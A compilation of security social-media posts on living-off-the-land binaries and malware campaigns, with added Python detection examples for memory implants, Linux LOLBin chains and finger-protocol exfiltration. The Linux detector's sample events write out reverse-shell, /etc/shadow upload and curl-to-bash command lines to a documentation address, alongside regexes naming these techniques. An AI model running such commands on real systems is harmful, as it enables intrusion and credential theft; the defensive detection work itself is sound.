CrashFix marks a notable escalation in ClickFix tradecraft.

The campaign combines browser DoS, fake Chrome extensions, delayed execution, LOLBin abuse (finger.exe → ct.exe), and a portable Python environment to deploy a covert RAT only after identifying high-value systems.

This is a strong case for:
• Behavior-based detection
• EDR in block mode
• Restricting legacy utilities
• User-focused threat modeling

💬 Which detection layer would catch this earliest in your environment?

Source: https://www.microsoft.com/en-us/security/blog/2026/02/05/clickfix-variant-crashfix-deploying-python-rat-trojan/

🔔 Follow @technadu for deep technical threat analysis

#InfoSec #CrashFix #ClickFix #PythonMalware #LOLBins #EDR #ThreatHunting #DetectionEngineering #MicrosoftDefender #TechNadu

No PE header? No problem.

@FortiGuardLabs dropped a deep dive into a malware sample dumped without a PE header — like a cybercriminal rage-quit halfway through packing their payload.

You ever load a binary in IDA and think, “Am I being punk’d?”
Yeah, it’s one of those samples.

This sample:

  • Reconstructs its own PE structure at runtime

  • Hides config data in obfuscated blobs

  • Uses anti-sandbox tricks to avoid analysis

  • Drops yet another info-stealer, because originality is dead

It’s engineered to break basic static analysis and dodge sandboxes like it’s speedrunning DEFCON CTF.

🔗 Full breakdown:
https://www.fortinet.com/blog/threat-research/deep-dive-into-a-dumped-malware-without-a-pe-header

TL;DR for blue teamers:

  • Static AV signatures won’t help here

  • Watch for suspicious memory allocations + hollowing patterns

  • Endpoint heuristics > file-based detection

  • Log your PowerShell and LOLBins — this thing probably brings friends

  • If your EDR cries when it sees raw shellcode, maybe give it a hug

#ThreatIntel #MalwareAnalysis #ReverseEngineering #Infosec #PEFilesAreSo2020 #EDREvasion #LOLbins #CyberSecurity #BlueTeam
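As an added illustration for the blue-team list above (not code from the FortiGuard Labs write-up or from the post's author), here is a Python sweep over a process's memory regions that flags the three shapes this kind of sample leaves in memory: a mapped image whose header has been wiped, a PE that was manually mapped into private executable memory, and a private executable region with no PE header at all but with the import strings a payload still needs to resolve at runtime. The region list is constructed sample data and the Win32 constants are the real MEMORY_BASIC_INFORMATION values; nothing here attaches to a live process.

```python
"""Heuristic sweep of a process's memory regions for PE images hidden from
file-based and header-based inspection: a mapped image with its header
wiped, a PE manually mapped into private memory, and an executable private
region carrying a payload with no PE header.

Added example, not code from the FortiGuard Labs post. SAMPLE_REGIONS is
constructed data; the constants are the Win32 MEMORY_BASIC_INFORMATION
values, but nothing here reads a live process.
"""
import re
from dataclasses import dataclass

MEM_IMAGE = 0x1000000
MEM_PRIVATE = 0x20000
PAGE_READONLY = 0x02
PAGE_READWRITE = 0x04
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
EXECUTABLE = {PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE}

# A payload that dropped its PE header still has to resolve imports at
# runtime, so strings like these tend to survive inside the blob.
API_HINTS = re.compile(
    rb"kernel32\.dll|ntdll\.dll|LoadLibrary[AW]|GetProcAddress|VirtualAlloc",
    re.IGNORECASE,
)


@dataclass
class Region:
    base: int
    mem_type: int
    protect: int
    data: bytes
    module_base: int = 0  # for MEM_IMAGE regions: base of the mapped module


def has_pe_header(blob: bytes) -> bool:
    """Structural check: DOS 'MZ', an in-bounds e_lfanew, and 'PE\\0\\0'."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(blob[0x3C:0x40], "little")
    # Real headers keep e_lfanew small; a huge value is a corrupt or forged stub.
    if e_lfanew >= 0x1000 or e_lfanew + 4 > len(blob):
        return False
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def scan_regions(regions):
    """Return (base, verdict) for every region that looks tampered or implanted."""
    findings = []
    for r in regions:
        pe = has_pe_header(r.data)
        if r.mem_type == MEM_IMAGE:
            # Only the first page of a module carries the header; section
            # pages never start with MZ, so they are not a finding.
            if r.base == r.module_base and not pe:
                findings.append((r.base, "image_header_wiped"))
        elif r.mem_type == MEM_PRIVATE and r.protect in EXECUTABLE:
            if pe:
                findings.append((r.base, "manually_mapped_pe"))
            elif API_HINTS.search(r.data):
                findings.append((r.base, "headerless_payload"))
    return findings


def minimal_pe() -> bytes:
    """Smallest blob has_pe_header accepts: MZ, e_lfanew -> 0x80, PE signature."""
    hdr = bytearray(0x200)
    hdr[:2] = b"MZ"
    hdr[0x3C:0x40] = (0x80).to_bytes(4, "little")
    hdr[0x80:0x84] = b"PE\x00\x00"
    return bytes(hdr)


# Constructed sample map (not a real process): a clean DLL, the main image
# with its header zeroed, a PE injected into private RWX memory, a headerless
# implant, a heap page that merely mentions kernel32.dll, and a section page.
SAMPLE_REGIONS = [
    Region(0x7FF900000000, MEM_IMAGE, PAGE_READONLY, minimal_pe(), module_base=0x7FF900000000),
    Region(0x140000000, MEM_IMAGE, PAGE_READONLY, bytes(0x200), module_base=0x140000000),
    Region(0x1F0000, MEM_PRIVATE, PAGE_EXECUTE_READWRITE, minimal_pe()),
    Region(0x2A0000, MEM_PRIVATE, PAGE_EXECUTE_READ,
           b"\x48\x83\xec\x28" + b"\x00" * 64 + b"kernel32.dll\x00GetProcAddress\x00"),
    Region(0x3B0000, MEM_PRIVATE, PAGE_READWRITE, b"log: loaded kernel32.dll"),
    Region(0x140001000, MEM_IMAGE, PAGE_EXECUTE_READ, b"\xcc" * 0x100, module_base=0x140000000),
]

if __name__ == "__main__":
    for base, verdict in scan_regions(SAMPLE_REGIONS):
        print(f"{base:#x}: {verdict}")
```

The heap page that contains the string kernel32.dll is deliberately not flagged: the signal is executable private memory plus import strings, not the strings alone, which keeps the noise down on ordinary processes.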

On Linux systems, some of the most dangerous hacking tools are already preinstalled. Bash, curl, netcat, awk, even less — these common binaries can be chained together for stealthy attacks. They are called Linux LOLBins, short for Living Off the Land Binaries. Rather than dropping new malware, an attacker can leverage what is already there to stay undetected. Need to exfiltrate data? Use curl or scp. Want a reverse shell? Try bash or socat. Fileless persistence, privilege escalation, lateral movement — it can all happen through trusted tools.

Security is not just about locking the doors. It is about knowing which ones are left wide open by default.

#LinuxSecurity #LOLBins #LivingOffTheLand #RedTeamTips #CommandLineWarfare
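To make the chaining concrete from the defender's side, here is an added Python example (not the post author's code) that runs a small rule set over process-execution records of the kind an auditd EXECVE/SYSCALL pair or an EDR process event already provides: pid, ppid, uid, comm and the command line. The records are constructed sample data and the rules are illustrative rather than exhaustive; the rule names are my own. The point it demonstrates is that the abuse pattern (where the bytes go, what gets piped into an interpreter, who spawned the shell) is detectable even though every binary involved is a trusted system tool.

```python
"""Rule-based detection of Linux living-off-the-land chains over process
execution records.

Added example; the records below are constructed sample data and the rule
set is illustrative, not exhaustive.
"""
import re

# Command-line rules: (name, regex over the reconstructed argv string).
CMDLINE_RULES = [
    ("reverse_shell_bash_devtcp", re.compile(r"\bbash\b.*/dev/tcp/\d")),
    ("reverse_shell_socat_exec", re.compile(r"\bsocat\b.*\b(exec|system):", re.I)),
    ("reverse_shell_nc_exec", re.compile(r"\b(nc|ncat|netcat)\b.*\s(-e|-c|--exec|--sh-exec)\s")),
    ("exfil_curl_upload_file", re.compile(r"\bcurl\b.*\s(-T|--upload-file)\s")),
    ("exfil_curl_form_or_data_file",
     re.compile(r"\bcurl\b.*\s(-F|--form|-d|--data|--data-binary)\s+\S*@\S")),
    ("exfil_scp_to_remote", re.compile(r"\bscp\b.*\s\S+\s+\S+@\S+:")),
    ("remote_fetch_piped_to_interpreter",
     re.compile(r"\b(curl|wget)\b.*\|\s*(bash|sh|zsh|dash|python3?|perl)\b")),
    ("awk_system_call", re.compile(r"\bawk\b.*system\(")),
]

SHELLS = {"sh", "bash", "dash", "zsh"}
# Programs with a well-known shell escape (!sh in less, :!sh in vim, ...).
# A shell whose parent is one of these is the escape firing.
ESCAPE_PARENTS = {"less", "more", "vim", "vi", "man", "find", "awk"}


def detect(events):
    """Map pid -> list of rule names for every event that trips a rule."""
    comm_by_pid = {e["pid"]: e["comm"] for e in events}
    findings = {}
    for e in events:
        hits = [name for name, rx in CMDLINE_RULES if rx.search(e["cmdline"])]
        parent = comm_by_pid.get(e["ppid"])
        if e["comm"] in SHELLS and parent in ESCAPE_PARENTS:
            hits.append(f"shell_escape_from_{parent}")
        if hits:
            findings[e["pid"]] = hits
    return findings


# Constructed sample events (pid 900 is an interactive shell not in the list).
SAMPLE_EVENTS = [
    {"pid": 1001, "ppid": 900, "uid": 1000, "comm": "bash",
     "cmdline": "bash -i >& /dev/tcp/203.0.113.5/4444 0>&1"},
    {"pid": 1002, "ppid": 900, "uid": 1000, "comm": "curl",
     "cmdline": "curl -s -F file=@/etc/shadow https://203.0.113.5/upload"},
    {"pid": 1003, "ppid": 900, "uid": 1000, "comm": "sh",
     "cmdline": "sh -c curl -fsSL http://203.0.113.5/s.sh | bash"},
    {"pid": 1004, "ppid": 900, "uid": 0, "comm": "less",
     "cmdline": "less /var/log/syslog"},
    {"pid": 1005, "ppid": 1004, "uid": 0, "comm": "sh",
     "cmdline": "/bin/sh"},
    {"pid": 1006, "ppid": 900, "uid": 1000, "comm": "scp",
     "cmdline": "scp /tmp/dump.tgz bob@203.0.113.5:/in/"},
    {"pid": 1007, "ppid": 900, "uid": 1000, "comm": "curl",
     "cmdline": "curl -sI https://example.com"},
    {"pid": 1008, "ppid": 900, "uid": 1000, "comm": "awk",
     "cmdline": 'awk BEGIN{system("/bin/sh")}'},
    {"pid": 1009, "ppid": 900, "uid": 1000, "comm": "socat",
     "cmdline": "socat tcp:203.0.113.5:4444 exec:/bin/bash,pty,stderr"},
]

if __name__ == "__main__":
    for pid, rules in detect(SAMPLE_EVENTS).items():
        print(pid, ", ".join(rules))
```

The parent/child rule is the one worth keeping even if the command-line regexes get noisy: `sudo less` on a log file is routine, while `less` spawning `/bin/sh` as root is not.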

They don’t need malware. They weaponize what’s already trusted - PowerShell, WMI, CertUtil. This is Living Off the Land. Defend or be devoured.
#LOLBins #infosec #cybersecurity #redteam #ethicalhacking #windowssecurity #postexploitation #DeadSwitch

http://tomsitcafe.com/2025/05/06/living-off-the-land-how-hackers-use-your-tools-against-you/

Living off the Land: How Hackers Use Your Tools Against You


Was looking for a good Awesome list on Living Off the Land ( #LOL #LOtL ) tools/techniques. Found some helpful sites / repos but either nothing I could contribute to or it was limited.

So... I made one: https://github.com/danzek/awesome-lol-commonly-abused

Contributions welcome, whether by replying to this post or sending a PR on GitHub.

#lolbins #lolbas

GitHub - danzek/awesome-lol-commonly-abused: Awesome list of Living off the Land (LOL) methods, tools, and features commonly abused by attackers

Hackers are abusing Microsoft tools more than ever before: abuse of LOLbins in cyberattacks is skyrocketing, Sophos says (TechRadar pro).

An awesome overview of all the LOL and GTFO stuff. Even though some are well known, it's a good overview.

https://github.com/sheimo/awesome-lolbins-and-beyond

#redteam #lolbin #gtfo #securityressource #lolbins #blueteam #detectionengineering

GitHub - sheimo/awesome-lolbins-and-beyond: A curated list of awesome LOLBins, GTFO projects, and similar 'Living Off the Land' security resources.

Detecting Malicious Use of LOLBins | Huntress

There are those within the cybersecurity community who’ve said for some time that the threat actor use of LOLBins makes them more difficult to detect, but that may not be the case. Moving from the use of LOLBins to how those native utilities are used by threat actors actually leads to some interesting detection opportunities.

Did you know that the finger command can be used for data exfil? We recently had an incident where this type of activity was found.

https://www.huntress.com/blog/cant-touch-this-data-exfiltration-via-finger

#DFIR #lolbins #lolbas #exfil #mchammer #CTI #cybersecurity
@keydet89

Can’t Touch This: Data Exfiltration via Finger

Threat actors frequently make use of native utilities during incidents. However, this blog post discusses a rarely-observed means of data exfiltration.
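For the finger.exe abuse in this post and in the CrashFix post above, here is an added Python example (not Huntress's or Microsoft's code) that works from the client side of the protocol. RFC 1288 defines the query as an optional "/W " followed by a username and CRLF, so `finger <chunk>@host` sends <chunk> verbatim to TCP/79 on host, and nothing stops <chunk> from being a slice of a file. The code assumes the exfil tool base64-encodes the data and sends it as fixed-size chunks in successive queries (real tooling varies); the captured query lines are constructed sample data, and the "what a normal username looks like" baseline is an assumption you would tune to your environment.

```python
"""Spotting data exfiltration through the finger protocol (TCP/79) from the
client's query lines, and reassembling what left.

Added example. Assumes base64 data sent as fixed-size chunks in successive
queries; CAPTURED is constructed sample data.
"""
import base64
import re
from collections import defaultdict

# Baseline assumption: an ordinary interactive query is a short, tame username.
USERNAME_CHARS = re.compile(r"^[A-Za-z0-9._-]{1,16}$")
B64_ALPHABET = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def normalize(line: str) -> str:
    """Strip CRLF and the optional /W (long-format) switch from a query line."""
    q = line.rstrip("\r\n")
    return q[3:] if q.startswith("/W ") else q


def classify(query: str) -> str:
    if USERNAME_CHARS.match(query):
        return "benign"
    if B64_ALPHABET.match(query):
        return "base64_chunk"   # too long for a username, or carries + / =
    return "malformed"          # spaces, odd bytes: not a username at all


def find_exfil(captured):
    """captured: (src, dst, raw_query_line) tuples in capture order.

    Returns, for each (src, dst) flow with at least two non-benign queries,
    the chunk run between the first and last flagged query and what it
    decodes to (None if the run is not valid base64). Taking the whole run
    means a short middle chunk that happens to look like a username is not
    lost from the reassembly.
    """
    by_flow = defaultdict(list)
    for src, dst, line in captured:
        by_flow[(src, dst)].append(normalize(line))
    report = {}
    for flow, queries in by_flow.items():
        flagged = [i for i, q in enumerate(queries) if classify(q) != "benign"]
        if len(flagged) < 2:
            continue
        run = queries[flagged[0]:flagged[-1] + 1]
        try:
            decoded = base64.b64decode("".join(run), validate=True)
        except ValueError:
            decoded = None
        report[flow] = {"chunks": run, "labels": [classify(q) for q in run],
                        "decoded": decoded}
    return report


# Constructed sample: two normal lookups from one host, and a credential file
# pushed out in 32-character base64 chunks from another.
SECRET = b"user=admin\r\npass=Winter2026!\r\ntoken=ab12-cd345\r\n"   # 48 bytes -> 64 chars
ENCODED = base64.b64encode(SECRET).decode()
CHUNKS = [ENCODED[i:i + 32] for i in range(0, len(ENCODED), 32)]
CAPTURED = [
    ("10.0.0.7", "198.51.100.9", "alice\r\n"),
    ("10.0.0.7", "198.51.100.9", "/W bob\r\n"),
    ("10.0.0.42", "203.0.113.9", CHUNKS[0] + "\r\n"),
    ("10.0.0.42", "203.0.113.9", CHUNKS[1] + "\r\n"),
]

if __name__ == "__main__":
    for (src, dst), info in find_exfil(CAPTURED).items():
        print(f"{src} -> {dst}:79  {len(info['chunks'])} chunks  {info['labels']}")
        print("  decoded:", info["decoded"])
```

On a network where nobody legitimately runs finger, the simpler signal is any outbound TCP/79 from a workstation at all; the decoder above is for the incident afterwards, when you need to know what actually left.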

"🍎 macOS Malware 2023: Navigating the New Threat Landscape 🌐"

Apple's XProtect recently updated to version 2173, introducing rules for Atomic Stealer and Adload. However, 2023 has unveiled novel methods to compromise Macs, leaving users vulnerable unless additional protective measures are taken. Key insights:

  • Shift in Malware Behavior: Many macOS malware families in 2023 have ditched persistence. Infostealers, for instance, achieve their goals in a single execution, stealing user data and then transmitting it to a remote server. 📥🔓

  • Sophisticated Social Engineering: Threat actors are employing advanced social engineering tactics. RustBucket malware, for example, lured victims with a business deal, urging them to download a 'proprietary' PDF viewer, which in reality was malware. 🎣📄

  • Public Offensive Security Tools: Tools like Geacon, which wraps Cobalt Strike capabilities, are now being seen in macOS malware. Open-source red teaming tools like Mythic and Poseidon have also been spotted in recent campaigns. 🛠️🔥

  • LOLBins Techniques: "Living off the orchard" techniques are on the rise in macOS. Built-in tools like system_profiler, sw_vers, and curl are being exploited for malicious purposes. 🌳🔧

  • Abusing Open Source Software: JokerSpy malware, discovered in July 2023, began its infection through a trojanized QR code generator, QRLog. This malware was found in enterprise breaches, including a major cryptocurrency exchange. 🔄💼

  • Complex Multi-Stage Malware: The Smooth Operator campaign, a sophisticated supply chain attack, compromised businesses via 3CX's call routing software client. The malware was designed for stealth, gathering limited data and then self-deleting. 📞🕵️

  • While Apple is enhancing its malware detection capabilities, third-party solutions are still crucial for comprehensive protection against both common and advanced threats. SentinelOne offers a robust platform for macOS threat detection and remediation. 🛡️💻

Source: SentinelOne

Tags: #macOS #Malware #CyberSecurity #XProtect #Infostealers #SocialEngineering #OffensiveSecurity #LOLBins #OpenSource #SentinelOne 🌍🔒🖥️

macOS Malware 2023 | A Deep Dive into Emerging Trends and Evolving Techniques

Apple’s security measures are evolving, but macOS malware is still one step ahead. Learn how to keep the Macs in your fleet safe from attackers.
